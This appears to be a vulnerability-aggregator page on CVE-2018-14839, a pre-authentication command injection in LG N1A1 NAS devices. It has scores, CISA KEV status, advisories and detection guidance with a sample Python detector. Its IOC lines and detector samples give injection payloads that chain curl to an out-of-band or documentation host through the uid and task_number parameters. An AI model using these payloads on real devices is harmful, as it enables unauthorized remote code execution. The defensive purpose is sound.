CVE-2018-14839
Published: 2019-05-14
CVE-2018-14839: LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.
Priority: P193 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 89.35% (99.8th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | n1a1_firmware | — | — |
Detection & IOCs (extracted from sources)
path: /system/sharedir.php
path: /en/php/usb_sync.php
command: &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
command: &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'
- Monitor for HTTP POST requests to /system/sharedir.php or /en/php/usb_sync.php on LG NAS devices, particularly those containing shell metacharacters (semicolons) in the uid or task_number parameters, indicating command injection attempts.
- The injection is pre-authentication: no valid session or credentials are required. Detect unauthenticated POST requests to the affected endpoints with parameter values containing command separators.
- The attack uses the uid parameter in /system/sharedir.php and the task_number parameter in /en/php/usb_sync.php as injection points. Alert on values containing semicolons or other shell metacharacters in these fields.
- Out-of-band detection: exploitation triggers outbound HTTP requests (e.g., curl) from the NAS device. Monitor for unexpected outbound HTTP connections originating from NAS devices.
- Content-Type for the exploit is application/x-www-form-urlencoded. Correlate POST requests with this Content-Type to the vulnerable PHP endpoints.
- The Nuclei template targets two distinct endpoints; both should be covered in detection rules as exploitation stops at the first successful match.
- The affected version is specifically LG N1A1 NAS firmware 3718.510; detections should be scoped to this device/firmware where asset inventory is available.
- This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation; prioritize detection and patching accordingly.
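The checks in the list above, as an added example (not part of the original page or of any vendor rule): it scans request records that include the POST body, which is an assumption about the log source, and flags shell metacharacters in `uid` or `task_number` on the two endpoints. No session check is made because the page describes the injection as pre-authentication; the function names and sample records are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Endpoint -> parameter named on this page as the injection point.
WATCHED = {
    "/system/sharedir.php": "uid",
    "/en/php/usb_sync.php": "task_number",
}
# Command separators and substitution characters; a numeric id never needs them.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

def form_fields(body):
    """Split on '&' only, then decode, so a literal ';' stays inside its value."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        if name:
            fields.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return fields

def check_request(method, path, body):
    """Return an alert dict for a suspicious request, else None."""
    param = WATCHED.get(path.split("?", 1)[0])
    if method.upper() != "POST" or param is None:
        return None
    for value in form_fields(body).get(param, []):
        if SHELL_META.search(value):
            return {"path": path, "param": param, "value": value}
    return None

# Constructed sample records (method, path, body); 192.0.2.10 is a documentation address.
SAMPLES = [
    ("POST", "/system/sharedir.php", "&uid=10"),
    ("POST", "/system/sharedir.php", "&uid=10; curl http://192.0.2.10/"),
    ("POST", "/en/php/usb_sync.php", "&act=sync&task_number=1%3Bcurl+http%3A%2F%2F192.0.2.10%2F"),
    ("GET", "/en/php/usb_sync.php", ""),
    ("POST", "/other.php", "id=admin&note=a;b"),  # unrelated endpoint, ignored
]

def run_samples():
    return [a for a in (check_request(*s) for s in SAMPLES) if a]

if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

Values are decoded before matching so that a percent-encoded separator such as `%3B` is caught as well as a raw semicolon.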
CVSS provenance
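| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |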
GHSA
GHSA-9h95-rv82-cwrc: LG N1A1 NAS 3718
ghsa_unreviewed·2022-05-24
CVE-2018-14839 [CRITICAL] CWE-78 GHSA-9h95-rv82-cwrc: LG N1A1 NAS 3718
LG N1A1 NAS 3718.510 is affected by: Remote Command Execution. The impact is: execute arbitrary code (remote). The attack vector is: HTTP POST with parameters.
VulnCheck
LG N1A1 NAS Remote Command Execution Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-14839 [CRITICAL] CWE-78 LG N1A1 NAS Remote Command Execution Vulnerability
LG N1A1 NAS Remote Command Execution Vulnerability
LG N1A1 NAS 3718.510 is affected by a remote code execution vulnerability.
Affected: LG N1A1 NAS
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2018-14839; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-04&host_type=src&vulnerability=cve-2018-14839; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2018-14839; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-
CISA
LG N1A1 NAS Remote Command Execution Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2018-14839 [CRITICAL] CWE-78 LG N1A1 NAS Remote Command Execution Vulnerability
Vulnerability: LG N1A1 NAS Remote Command Execution Vulnerability
Affected: LG N1A1 NAS
LG N1A1 NAS 3718.510 is affected by a remote code execution vulnerability.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-14839
Remediation Due Date: 2022-04-15
No detection rules found.
Nuclei
LG NAS Devices - Remote Code Execution
nuclei
CVE-2018-10818 LG NAS Devices - Remote Code Execution
LG NAS Devices - Remote Code Execution
LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
Template:
```yaml
id: CVE-2018-10818
info:
  name: LG NAS Devices - Remote Code Execution
  author: gy741
  severity: critical
  description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  remediation: |
    Apply the latest firmware update provided by LG to mitigate this vulnerability.
  reference:
    - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
    - https://cve.mitre.or
```
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Authors: Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu
Published: October 14, 2021
- 2019-05-14: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild